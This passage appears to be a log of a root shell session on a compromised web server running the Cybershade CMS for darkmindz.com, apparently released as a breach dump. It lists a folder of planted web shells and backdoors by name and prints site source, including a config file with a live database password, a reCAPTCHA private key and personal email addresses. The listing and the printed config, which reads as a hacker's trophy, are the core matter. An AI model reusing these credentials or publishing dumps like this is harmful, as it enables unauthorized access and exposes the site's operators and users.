1092. -rw-r--r-- 1 romeo romeo 2711 Jan 13 12:11 scriptaculous.js
1093. -rw-r--r-- 1 romeo romeo 121 Jan 13 12:11 shoutbox.js
1094. -rw-r--r-- 1 romeo romeo 10296 Jan 13 12:12 slider.js
1095. -rw-r--r-- 1 romeo romeo 1920 Jan 13 12:12 sound.js
1096. -rw-r--r-- 1 romeo romeo 20197 Jan 13 12:12 unittest.js
1097. -rw-r--r-- 1 romeo romeo 6145 Feb 14 12:40 user.php
1098. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1099. public_html]# ls -la shell/
1100. total 1564
1101. drwxr-xr-x 2 root root 4096 May 20 14:30 .
1102. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
1103. -rw-r--r-- 1 romeo romeo 1297 Feb 16 21:05 ajan.txt
1104. -rw-r--r-- 1 romeo romeo 44210 Feb 16 21:06 b64.txt
1105. -rw-r--r-- 1 romeo romeo 140 Feb 16 21:06 backdoor.txt
1106. -rw-r--r-- 1 romeo romeo 11141 Feb 16 21:06 c101.txt
1107. -rw-r--r-- 1 romeo romeo 1468 Feb 16 21:06 cmd.txt
1108. -rw-r--r-- 1 romeo romeo 18519 Feb 16 21:06 codeanalyzer.txt
1109. -rw-r--r-- 1 romeo romeo 114861 Feb 16 21:06 constance.txt
1110. -rw-r--r-- 1 romeo romeo 40682 Feb 16 21:06 CrystalShell v.1.txt
1111. -rw-r--r-- 1 romeo romeo 83029 Feb 16 21:06 CyberSpy5.txt
1112. -rw-r--r-- 1 romeo romeo 43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
1113. -rw-r--r-- 1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
1114. -rw-r--r-- 1 romeo romeo 39433 Feb 16 21:06 eko.txt
1115. -rw-r--r-- 1 romeo romeo 38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
1116. -rw-r--r-- 1 romeo romeo 24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
1117. PRiV8.txt
1118. -rw-r--r-- 1 romeo romeo 2089 Feb 16 21:06 imageshell.JPG
1119. -rw-r--r-- 1 romeo romeo 1768 Feb 16 21:06 index.php
1120. -rw-r--r-- 1 romeo romeo 17440 Feb 16 21:06 kscript.txt
1121. -rw-r--r-- 1 romeo romeo 2342 Feb 16 21:06 l0ger.txt
1122. -rw-r--r-- 1 romeo romeo 1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
1123. -rw-r--r-- 1 romeo romeo 33796 Feb 16 21:06 Mysql interface v1.0.txt
1124. -rw-r--r-- 1 romeo romeo 34398 Feb 16 21:06 mysql.txt
1125. -rw-r--r-- 1 romeo romeo 38856 Feb 16 21:06 ntdaddy.txt
1126. -rw-r--r-- 1 romeo romeo 124953 Feb 16 21:06 r57.txt
1127. -rw-r--r-- 1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
1128. -rw-r--r-- 1 romeo romeo 7002 Feb 16 21:06 steg.txt
1129. -rw-r--r-- 1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
1130. -rw-r--r-- 1 romeo romeo 70402 Feb 16 21:06 webadmin.txt
1131. -rw-r--r-- 1 romeo romeo 5057 Feb 16 21:06 WinX Shell.txt
1132. -rw-r--r-- 1 romeo romeo 2455 Feb 16 21:06 Worse Linux Shell.txt
1133. -rw-r--r-- 1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
1134. -rw-r--r-- 1 romeo romeo 10418 Feb 16 21:06 XSSscan.py.txt
1135. -rw-r--r-- 1 romeo romeo 10269 Feb 16 21:06 xx.txt
1136. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1137. public_html]# #ELEET
1138. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1139. public_html]# ls -al
1140. total 47264
1141. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
1142. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
1143. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
1144. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
1145. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
1146. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
1147. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
1148. -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
1149. -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
1150. -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
1151. drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
1152. drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
1153. drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
1154. -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
1155. -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
1156. -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
1157. drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
1158. -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
1159. -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
1160. -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
1161. -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
1162. -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
1163. -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
1164. -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
1165. -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
1166. drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
1167. drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
1168. -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
1169. -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
1170. drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
1171. -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
1172. -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
1173. -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
1174. -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
1175. -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
1176. drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
1177. -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
1178. -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
1179. -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
1180. -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
1181. -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
1182. -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
1183. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
1184. -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
1185. -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
1186. drwxr-xr-x 2 root root 4096 May 20 14:30 shell
1187. -rw-r--r-- 1 romeo romeo 46488303 May 23 04:08 stress_test.txt
1188. -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
1189. drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
1190. -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
1191. drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
1192. -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
1193. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
1194. -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
1195. -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
1196. -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
1197. -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
1198. -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
1199. -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
1200. -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
1201. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1202. public_html]# cat test.php
1203. <?php
1204. /*======================================================================*\
1205. | Cybershade CMS - Your CMS, Your Way |
1206. \*======================================================================*/
1207. define('INDEX_CHECK', 1);
1208. define('CMS_DEBUG', 0);
1209. define('CMS_MENU', 'forum');
1210. $cms_root = '';
1211. $page_name = '';
1212. include "core/core.php";
1213.  
1214. $breadcrumb = array(
1215. );
1216.  
1217. include "core/page_header.php";
1218.  
1219. mail("crawleruk@gmail.com", 'test', "mail() sent msg");
1220. mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
1221. msg');
1222.  
1223. include "core/page_footer.php";
1224. ?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1225. public_html]# ls -la
1226. total 47264
1227. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
1228. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
1229. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
1230. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
1231. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
1232. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
1233. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
1234. -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
1235. -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
1236. -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
1237. drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
1238. drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
1239. drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
1240. -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
1241. -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
1242. -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
1243. drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
1244. -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
1245. -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
1246. -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
1247. -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
1248. -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
1249. -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
1250. -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
1251. -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
1252. drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
1253. drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
1254. -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
1255. -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
1256. drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
1257. -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
1258. -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
1259. -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
1260. -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
1261. -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
1262. drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
1263. -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
1264. -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
1265. -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
1266. -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
1267. -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
1268. -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
1269. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
1270. -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
1271. -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
1272. drwxr-xr-x 2 root root 4096 May 20 14:30 shell
1273. -rw-r--r-- 1 romeo romeo 46488756 May 23 04:08 stress_test.txt
1274. -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
1275. drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
1276. -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
1277. drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
1278. -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
1279. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
1280. -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
1281. -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
1282. -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
1283. -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
1284. -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
1285. -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
1286. -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
1287. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1288. public_html]# less ucp.php
1289. <?php
1290. /*======================================================================*\
1291. | Cybershade CMS - Your CMS, Your Way |
1292. \*======================================================================*/
1293. define('INDEX_CHECK', 1);
1294. define('CMS_DEBUG', 0);
1295. define('CMS_MENU', 'ucp');
1296. $cms_root = '';
1297. $page_name = 'Profile';
1298. include $cms_root."core/core.php";
1299. if (!$_user->is_online){redirect("/".root()."index.php");}
1300.  
1301. $mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
1302. $auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
1303. $switch = isset($_GET['action']) ? $_GET['action'] : '';
1304.  
1305. $uid = $config['global']['user']['id'];
1306. if((int)isset($_GET['uid']) &&
1307. $_user->check_permissions($config['global']['user
1308. ']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
1309. $uid = (int)$_GET['uid'];
1310. }else{
1311. $uid = $config['global']['user']['id'];
1312. ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1313. public_html]# cd core
1314. root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
1315. core]# ls -al
1316. total 164
1317. drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 .
1318. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
1319. -rw-r--r-- 1 romeo romeo 731 Jan 13 07:34 admin.js
1320. -rw-r--r-- 1 romeo romeo 27395 Feb 18 09:08 base_functions.php
1321. -rw-r--r-- 1 romeo romeo 9098 Feb 21 10:50 bbcode_tags.php
1322. -rw-r--r-- 1 romeo romeo 2816 Feb 1 08:55 cacher.php
1323. drwxr-xr-x 4 romeo romeo 4096 Feb 10 13:29 classes
1324. -rw-r--r-- 1 romeo romeo 1436 Feb 2 08:33 cli.php
1325. -rw-r--r-- 1 romeo romeo 2848 Feb 8 08:46 config.php
1326. -rw-r--r-- 1 romeo romeo 23810 Apr 19 16:45 core.php
1327. -rw-r--r-- 1 romeo romeo 4518 Feb 1 08:55 cron.php
1328. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 err
1329. -rw-r--r-- 1 romeo romeo 236 Feb 2 08:33 force_user.php
1330. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 functions
1331. -rw-r--r-- 1 romeo romeo 1181 Feb 2 08:33 key.php
1332. -rw-r--r-- 1 romeo romeo 6903 Feb 2 08:33 mailer.php
1333. drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 mint
1334. -rw-r--r-- 1 romeo romeo 3054 Feb 14 06:17 page_footer.php
1335. -rw-r--r-- 1 romeo romeo 5935 Feb 14 06:17 page_header.php
1336. -rw-r--r-- 1 romeo romeo 9762 Feb 2 08:33 recaptchalib.php
1337. -rw-r--r-- 1 romeo romeo 6658 Apr 26 07:51 security.php
1338. -rw-r--r-- 1 romeo romeo 2021 Feb 2 08:33 usertracker.php
1339. root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
1340. core]# cat config.php
1341. <?php
1342. //Cybershade.Org
1343.  
1344. //Database Stuff
1345. $config['db']['host'] = 'localhost';
1346. $config['db']['username'] = 'romeo_romeo';
1347. $config['db']['password'] = 'swU55ath';
1348. $config['db']['database'] = 'romeo_DMZ_CS';
1349. $config['db']['prefix'] = 'dmz_';
1350. $config['db']['shrfix'] = 'shr_'; //the prefix
1351. for the shared tables
1352. $config['db']['ckefix'] = 'CMS_'; //the cookie prefix
1353. $config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
1354. is also a good way to invalidate the autologins on cms update
1355. $config['site']['working_dir'] = '';
1356.  
1357. //config vars for if we loose the DB
1358. $config['cms']['name'] = 'DarkMindZ';
1359. $config['cms']['version'] = '_DDoS';
1360. $config['cms']['debug'] = "0";
1361. $config['site']['title'] = 'CyberShade CMS';
1362. $config['site']['theme'] = 'cs';
1363. $config['site']['language'] = 'en';
1364. $config['site']['keywords'] = '';
1365. $config['site']['description'] = '';
1366. $config['site']['max_login_tries'] = "5";
1367. $config['site']['time'] = 'jS F h:ia';
1368. $config['site']['template_override'] = "1";
1369. $config['site']['auto_login'] = "1";
1370. $config['site']['ips_max_before_ban'] = "5";
1371.  
1372. $config['site']['hourly_time'] = 3600; //1 Hour
1373. $config['site']['daily_time'] = (3600*24); //1 Day
1374. $config['site']['weekly_time'] = (3600*24*7); //1 Week
1375.  
1376. $config['site']['default_module'] = 'core';
1377. $config['site']['closed'] = "0";
1378. $config['site']['admin_email'] = 'romeo.haxxor@gmail.com';
1379. $config['site']['usernamechange'] = "0";
1380. $config['site']['fc_update'] = "1220620615";
1381. $config['site']['paginate'] = "8";
1382. $config['site']['news_cat'] = "2";
1383. $config['site']['captcha_pub'] =
1384. '6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
1385. $config['site']['captcha_priv'] =
1386. '6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
1387. $config['site']['announcement'] = 'No Current Announcements, This may
1388. be because the Database has gone down.';
1389. $config['rss']['global_limit'] = "15";
1390. $config['site']['max_whitelist'] = "5";
1391. $config['movemod']['move_enabled'] = "0";
1392. $config['site']['quick_replys'] = "0";
1393. $config['site']['users_online'] = "0";
1394. $config['site']['guests_online'] = "0";
1395.  
1396. //Statistics shit fort the same reason (Only used when the DB is inactive,
1397. setting it to time() + 9999999 means the cron will never be run)
1398. $config['statistics']['hourly_cron'] = "9999999999999";
1399. $config['statistics']['daily_cron'] = "9999999999999";
1400. $config['statistics']['weekly_cron'] = "9999999999999";
1401. $config['statistics']['total_members'] = 'N/A, (DDoS)';
1402. $config['statistics']['last_user_user'] = 'N/A, (DDoS)';
1403. $config['statistics']['last_user_id'] = 'N/A, (DDoS)';
1404. root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
1405. core]# cat core.php
1406. <?php
1407. /*======================================================================*\
1408. | Cybershade CMS - Your CMS, Your Way. |
1409. \*======================================================================*/
1410. if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
1411.  
1412. error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
1413. define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
1414. //this is to start the generation timer off
1415. $gen_time = microtime();
1416.  
1417. //Include the session stuff
1418. if(!SMODE) require($cms_root."core/classes/class.session.php");
1419. if(SMODE) require($cms_root."core/classes/classes.php");
1420. $_sess = new session;
1421.  
1422. //Set the headers
1423. header("Cache-control: private");
1424. header("Content-Type: text/html; charset=utf-8");
1425. //ob_start("ob_gzhandler");
1426.  
1427. /////////////////////////////////////////////////////////////////////////////
1428. //--Include the core CMS files needed -------------------------------------//
1429. /////////////////////////////////////////////////////////////////////////////
1430.  
1431. //The config files
1432. require($cms_root."core/config.php");
1433.  
1434. /*this is the ultimate cache-er xD, k so basically u got
1435. * the var below which "allows" the static cacher through
1436. */
1437.  
1438. #$allow = true;
1439.  
1440. //this little switch decided what should be auto cache'd
1441. /*switch(CMS_MENU){
1442. case 'forum': $allow = false; break;
1443. case 'admin': $allow = false; break;
1444. case 'ucp': $allow = false; break;
1445. case 'login': $allow = false; break;
1446. case 'main': $allow = false; break;
1447. case 'pm': $allow = false; break;
1448. default: $allow = true; break;
1449. }
1450.  
1451. if($allow){
1452. // Get the modification date of this PHP file
1453. $timestamps = array(@getlastmod());
1454.  
1455. // The latest of these modification dates is our real Last-Modified date
1456. $timestamp = max($timestamps);
1457.  
1458. // Note that this is not a RFC 822 date (the tz is always GMT)
1459. $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
1460.  
1461. // Check if the client has the same page cached
1462. if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
1463. ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
1464. header("HTTP/1.1 304 Not Modified");
1465. exit();
1466. }
1467. // Inform the user what is our last modification date
1468. else {
1469. header("Last-Modified: " . $tsstring);
1470. }
1471. }*/
1472.  
1473. //The class files
1474. require($cms_root."core/classes/class.sql.php");
1475. if(!SMODE)require($cms_root."core/classes/class.login.php");
1476. if(!SMODE)require($cms_root."core/classes/class.user.php");
1477. if(!SMODE)require($cms_root."core/classes/class.form.php");
1478. if(!SMODE)require($cms_root."core/classes/class.time.php");
1479. require($cms_root."core/classes/class.nbbc.php");
1480. require($cms_root."core/classes/class.tpl.php");
1481. if(!SMODE)require($cms_root."core/classes/class.cache.php");
1482. require($cms_root."core/classes/class.geshi.php");
1483.  
1484. //The base functions
1485. require($cms_root."core/base_functions.php");
1486.  
1487. /////////////////////////////////////////////////////////////////////////////
1488. //--Sort out the cached config stuff---------------------------------------//
1489. /////////////////////////////////////////////////////////////////////////////
1490. $config_db = array();
1491. //check see if the config file exists, if not then just create a blank config
1492. variable
1493. if(file_exists($cms_root."cache/cache_config.php")){ include
1494. $cms_root."cache/cache_config.php"; }
1495.  
1496. //If the config_db is not null, cached.. then use it.
1497. if($config_db !== NULL){
1498. foreach($config_db as $array){
1499. $config[$array['array']][$array['var']] = $array['value'];
1500. }
1501. unset($array);
1502. }
1503.  
1504. if(isset($_GET['_site'])){
1505. $a=(isset($_GET['_site']) ? $_GET['_site'] :
1506. (isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
1507. $config['db']['prefix']));
1508. switch($a){
1509. case 'dmz':
1510. $_SESSION['site']['mode'] = 'dmz_';
1511. break;
1512. case 'cs':
1513. $_SESSION['site']['mode'] = 'cs_';
1514. break;
1515. default:
1516. }
1517. }
1518. if(isset($_SESSION['site']['mode']))
1519. $config['db']['prefix'] = $_SESSION['site']['mode'];
1520.  
1521. /////////////////////////////////////////////////////////////////////////////
1522. //--Define new instances of required classes-------------------------------//
1523. /////////////////////////////////////////////////////////////////////////////
1524. //start the sql
1525. $_sql = new sql(true);
1526. $_sql->config = $config;
1527. if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
1528. if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
1529.  
1530.  
1531. //Open the session stuff
1532. $_sess->sql = $_sql;
1533. $_sess->config = $config;
1534.  
1535. //start the form class
1536. $_form = new form;
1537.  
1538. //start the user class
1539. $_user = new user;
1540. $_user->config = $config;
1541. $_user->sql = $_sql;
1542.  
1543.  
1544. //start the login
1545. $_login = new login((isset($config['site']['autologin']) ? true : false));
1546. $_login->config = $config;
1547. $_login->sql = $_sql;
1548. $_login->form = $_form;
1549. $_login->sess = $_sess;
1550. $_login->user = $_user;
1551. $_user->login = $_login;
1552.  
1553. //require($cms_root."core/key.php");
1554.  
1555. //start the time class
1556. $_time = new time;
1557. $_time->config = $config;
1558.  
1559. //start the bbcode class
1560. $_bbcode = new bbcode;
1561. $_bbcode->SetDebug(true);
1562. $_bbcode->SetDetectURLs(false);
1563. $_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
1564. src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
1565. /></a>');
1566. $_bbcode->ClearSmileys();
1567. $_bbcode->SetSmileyDir('/'.root().'images/smilies');
1568. include($cms_root."core/bbcode_tags.php");
1569.  
1570. $_bbcode->user = $_user;
1571. $_user->bbcode = $_bbcode;
1572.  
1573. //start the cache && template classes
1574. $_cache_path = $cms_root."cache/";
1575. if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
1576. $_cache_ = (is_writable($_cache_path) ? true : false);
1577. $_cache = new Cache($_sql, $_cache_path, $_cache_);
1578. $_cache->config = $config['db'];
1579.  
1580. //regenerate the site cache
1581. if($config!==NULL || !empty($config)){
1582. $config_db = $_cache->generate_cache("config_db", "cache_config.php",
1583. "SELECT * FROM ".$config['db']['prefix']."config");
1584. foreach($config_db as $array){
1585. $config[$array['array']][$array['var']] = $array['value'];
1586. }
1587. unset($array,$config_db);
1588. }
1589.  
1590. //start the template class
1591. $_template = new template('.', $_cache_, $_cache_path."files/");
1592. $_template->cms_root = $cms_root;
1593. $_template->user = $_user;
1594.  
1595. $_login->template = $_template;
1596.  
1597. //start the language class
1598. $_language = $config['site']['language'];
1599. if(isset($_SESSION['user']['language'])){
1600.  
1601. if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
1602. ){
1603. $_language = $_SESSION['user']['language'];
1604. }
1605. }
1606. require($cms_root."language/".$_language."/main.php");
1607. $_time->cur_lang = $_language;
1608.  
1609. //run the lang pass function on the language vars AFTER we included the base
1610. functions.
1611. foreach($_lang as $key => $value){
1612. if(!is_array($_lang[$key])){
1613. $_lang[$key] = lang_pass($_lang[$key]);
1614. }
1615. }
1616.  
1617. $_time->lang = $_lang;
1618. $_bbcode->lang = $_lang;
1619. $_login->lang = $_lang;
1620. //Include the security files.. recaptchalib maybe add into the login class
1621. require($cms_root."core/security.php");
1622.  
1623. require($cms_root."core/classes/class.captcha.php");
1624. $_captcha = new Captcha($config['site']['captcha_pub'],
1625. $config['site']['captcha_priv']);
1626.  
1627. $_cms_root = $cms_root;
1628. //Include the mailer
1629. require($cms_root."core/mailer.php");
1630. $cms_root = $_cms_root;
1631.  
1632. /////////////////////////////////////////////////////////////////////////////
1633. //--Continue with the configuration----------------------------------------//
1634. /////////////////////////////////////////////////////////////////////////////
1635. define('ADMIN', 9);
1636. define('DEV', 8);
1637. define('GMOD', 7);
1638. define('MOD', 5);
1639. define('USER', 1);
1640. define('BANNED', 0);
1641.  
1642. //add some stuff to the config
1643.  
1644. //generate guest defaults
1645. $guest['user']['id'] = '0';
1646. $guest['user']['username'] = 'Guest';
1647. $guest['user']['theme'] = $config['site']['theme'];
1648. $guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
1649. $_SESSION['user']['userkey'] : NULL;
1650.  
1651. //generate user stuff
1652. $config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
1653. : $guest['user']);
1654. $config['global']['ip'] = getIP();
1655. $config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
1656. $_SERVER['HTTP_USER_AGENT'] : NULL);
1657. $config['site']['guests_online'] = (isset($guests_online) &&
1658. is_numeric($guests_online) ? $guests_online : 0);
1659. $config['site']['users_online'] = (isset($_users_online) &&
1660. is_numeric($_users_online) ? $_users_online : 0);
1661. $_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
1662. : false;
1663.  
1664. #if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
1665.  
1666. $tpl = $config['site']['theme'];
1667. if($config['site']['template_override']){
1668. if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
1669. }else{
1670. if(isset($config['global']['user']['template']) &&
1671. is_dir($cms_root."template/".$config['global']['user']['template']."/")){
1672. $tpl = $config['global']['user']['template'];
1673. }
1674. }
1675. $_template->config = $config;
1676. $_template->tpl = $tpl;
1677.  
1678. //None of these should be defined as vars as they can be over writtin.. They
1679. are defines
1680. $_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
1681. $config['site']['default_module']);
1682. $_user_temp = $cms_root."template/".$tpl."/";
1683. $_module_temp = $cms_root."modules/".$_module."/template/";
1684.  
1685. if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
1686. unset($_SESSION['login']);
1687. }
1688.  
1689. $_template->set_rootdir($cms_root);
1690.  
1691. define('IS_MOD', $_user->check_permissions($config['global']['user']['id'],
1692. MOD));
1693. define('IS_GMOD', $_user->check_permissions($config['global']['user']['id'],
1694. GMOD));
1695. define('IS_DEV', $_user->check_permissions($config['global']['user']['id'],
1696. DEV));
